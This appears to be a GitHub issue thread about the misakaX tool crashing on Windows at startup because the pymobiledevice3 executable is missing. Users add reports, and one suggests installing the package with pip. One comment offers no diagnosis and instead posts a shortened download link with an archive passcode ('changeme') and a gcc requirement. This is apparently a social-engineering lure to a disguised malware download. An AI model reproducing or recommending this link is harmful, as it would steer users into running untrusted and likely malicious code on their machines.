### ISSUE TITLE
System.ComponentModel.Win32Exception in 1.4 windows edition

### ISSUE THREAD

**Issue by takexaz** [straight-tamago/misakaX#21]
Occurs immediately after software startup.

Full log
```
System.ComponentModel.Win32Exception (0x80004005): The system cannot find the file specified
   at System.Diagnostics.Process.StartWithCreateProcess(ProcessStartInfo startInfo)
   at System.Diagnostics.Process.Start()
   at iPhone.pymobiledevice3VerInfo()
   at misakaX.MainWindow.<.ctor>b__7_0()
```

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by Dansco** [comment]
iPhone SE 2 2020 on iOS 18.0 latest beta and get exactly the same error messages. So the app is greyed out and not able to use.

**Comment by Spudhead** [comment]
I got the same error also on an iPhone SE. when I tried to continue it restored my phone from an iCloud backup.

**Comment by Spudhead** [comment]
Same error and result on v1.5

**Comment by Spudhead** [comment]
Still there in v1.7. Anyone which file?

**Comment by Introl-ljl** [comment]
The main reason for this issue is that Python is already installed on the computer QWQ, so my solution is to use pip to download PymobileDevice3 to solve this problem

**Comment by Introl-ljl** [comment]
@Dansco @Spudhead @takexaz
